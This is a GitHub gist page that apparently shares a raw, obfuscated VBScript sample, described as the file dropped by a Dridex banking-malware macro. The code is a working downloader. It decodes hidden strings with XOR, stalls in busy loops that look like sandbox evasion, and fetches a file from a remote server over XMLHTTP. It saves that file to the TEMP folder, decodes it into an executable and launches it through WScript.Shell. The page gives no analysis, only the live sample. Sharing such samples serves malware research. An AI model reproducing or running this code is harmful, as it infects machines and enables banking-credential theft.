Skip to content

Instantly share code, notes, and snippets.

@Antelox

Antelox/vbs_dropped.vbs Secret

Created Jul 14, 2016
Star
Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
VBS file dropped by the macro dridex.vb
Raw
vbs_dropped.vbs
DiM BeXExdU
Sub MjX2jEP()
Sfea1=45
SHj=""""
DysHN8=16
RoMO=BeXExdU & LO6F & QAR("6F233923","FA")
L1Z0MOR=17
Pi BeXExdU & QAR("6B1B190F","JEqihx"),RoMO
LwY2N=31
iF NvFLDqD="" tHEN UX0(4)
TQ=64
FK="Xf"
GP=14
sEt DG=crEATEobjeCT(QAR("310B052A0F281276353003340A",FK))
LH=35
DG.ruN SHj & RoMO & SHj,2952-2951,3057-3057
PJgiPS=84
End suB
fuNCTion Pi(NU,L5)
Sj=66
diM KtdnnFk,IMOMhem,LD8Ht,QQvlw,AhdtC(5)
BCkE=27
AhdtC(4)=56
Sd=77
AhdtC(1)=100
UVJ3aB=38
AhdtC(2)=103
RODp=92
AhdtC(5)=57
B98G=74
AhdtC(3)=53
Fpvjy=64
AhdtC(0)=104
Per87O=32
WK=10
SEt KtdnnFk=crEateOBjEct(QAR("6411220B08043D59157E24111C31640B23161D1D1B551835010C", "T7rPbxp"))
M1zo9yT=86
SEt IMOMhem=KtdnnFk.getFILE(NU)
IkHhtkk=5
sET QQvlw=IMOMhem.opeNAstExtStREAM(7344-7343,4140-4140)
K4O=10
QQvlw.SkiP((-3106+8174))
Lpu=36
sEt LD8Ht=KtdnnFk.crEaTEtExTfIle(L5,6596-6595,6210-6210)
PM1=46
dO unTil QQvlw.AteNDoFstReaM
LD8Ht.wRitE CRjB4(N5t(Qge3PL(QQvlw.rEaD(722-721)),AhdtC(0)))
LoOp
KXK6=25
LD8Ht.cLOSe
ELNfOS=73
QQvlw.CLoSE
Puu=41
eNd funCtIoN
fuNCTion Qge3PL(IHhqL)
Pr=79
Qge3PL=aSc(IHhqL)
LWvASE=84
EnD fuNctIon
FUnCtiOn LO6F()
VbuyEpu=61
LO6F=SecoND(TImE)
AsT=29
ENd fuNCtiOn
UyfN=35
Se
fuNCtIoN XqMW(MP)
Rg=93
DiM NkNi,MZeP
GOBJ=4
LO="KZ1m"
UU7IwA0=44
On ErROR RESUMe NExT
UazxByP=33
TXFpi46="WuQG"
AKFfi=42
Set NkNi=cReatEoBJeCt(QAR("220224251C2133792639223B19",TXFpi46))
Q2XYS=34
WlLuFIN="Up"
YQX
ULL8L69=84
Set F6=NkNi.eNvirONMent(QAR("3165230571030A","Ya7lF4P"))
MCRL=72
BeXExdU=F6(QAR("19220507391819","LXrUCx"))&CRjB4(92)& LO6F & LO6F
WwLm=54
QT6h="Dq5BYt9"
T6=52
SeT MZeP=creaTEobjEct(QAR("3C5C212B1B4A2B17416C0139750C256112",QT6h))
QDOESlK=36
MZeP.OpeN QAR("727636","C53bsi"),MP,1978-1978
Mh=86
MZeP.SEnd()
TIiAOwk=31
if MZeP.STaTuS=200 then
MOob0j9=86
YQX
CWPn=24
UX0(4)
SPZIw87=11
Cs MZeP.reSpoNSEbODY
KTDr=79
G91Ka=49
end if
UOK=54
eNd FUNCtioN
suB Se()
Fc7=18
RUXRC=91782317
Mv=69
For ClFZS=1 To RUXRC
Tsz5=Tsz5+1
NeXT
Pf1I=5
If Tsz5=RUXRC thEn
OTbR9=59
UX0(250)
V1aa=7
XqMW(QAR("382D11214A777F3B17381E3F7D34007F19367F2A107F1A2837","XPYeQp"))
QA8f=68
EnD iF
Qq=54
EnD Sub
Sub UX0(BBQk9Rx)
UU6PUo=18
dIm RYYQB1Z
Td7=48
RYYQB1Z=timER+BBQk9Rx
dO WhiLe TimER<RYYQB1Z
lOoP
CPbp=85
eNd Sub
suB Cs(V7Aznv)
P9XlqU=64
dIM XwEB
Ov=57
LfuLTwU="ICih5"
WqI6=45
seT XwEB=creATeObjECt(QAR("022D27710B6D3A1C472C2204",LfuLTwU))
JC=27
XwEB.oPeN
WTnUP=89
XwEB.tYPE=1692-1691
PYJgfZ=35
XwEB.wriTe V7Aznv
CEtBtm=22
XwEB.saveTofile BeXExdU & QAR("18283157","I6BA0mS"),7034-7032
Jz0w9cK=79
XwEB.CLOse
MS=97
MjX2jEP
GkF8=52
EnD suB
suB YQX()
Rs=74
Dim Q0F9zS, YFKjp4
For Q0F9zS = 64 To 5000263
YFKjp4 = Sr4gna + 6 + 75 + 96
Next
BwNxCRw=1
eNd Sub
fUNctIon N5t(U1X7v6,Vfi2NT)
T12eoU=38
N5t=(U1X7v6 AnD noT Vfi2NT)oR(NoT U1X7v6 aND Vfi2NT)
EZ5F=22
eNd fUncTiOn
fUnCTIOn QAR(Lz,SkHjfd)
MGqYl4Z=3
diM JLJXb,Y8xV,TKRg8
SVjAz=44
For JLJXb=1 To (LEn(Lz)/2)
Y8xV=(CRjB4(38) & CRjB4(72)&(mID(Lz,(JLJXb+JLJXb)-1,2)))
TKRg8=(Qge3PL(mId(SkHjfd,((JLJXb MoD Len(SkHjfd))+1),1)))
QAR=QAR+CRjB4(N5t(Y8xV,TKRg8))
Next
GFr=85
ENd functIoN
sUb S72qH81()
PO5z3US=10
Dim E0QT5vd,CwHM
Rp=22
dO whiLE E0QT5vd<>2520-2519
CwHM=CwHM+1
LoOP
IR=8
EnD SUb
FunCTiOn CRjB4(Ab93Ig)
DQG=35
CRjB4=ChR(Ab93Ig)
ToE=66
eND FUNction
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment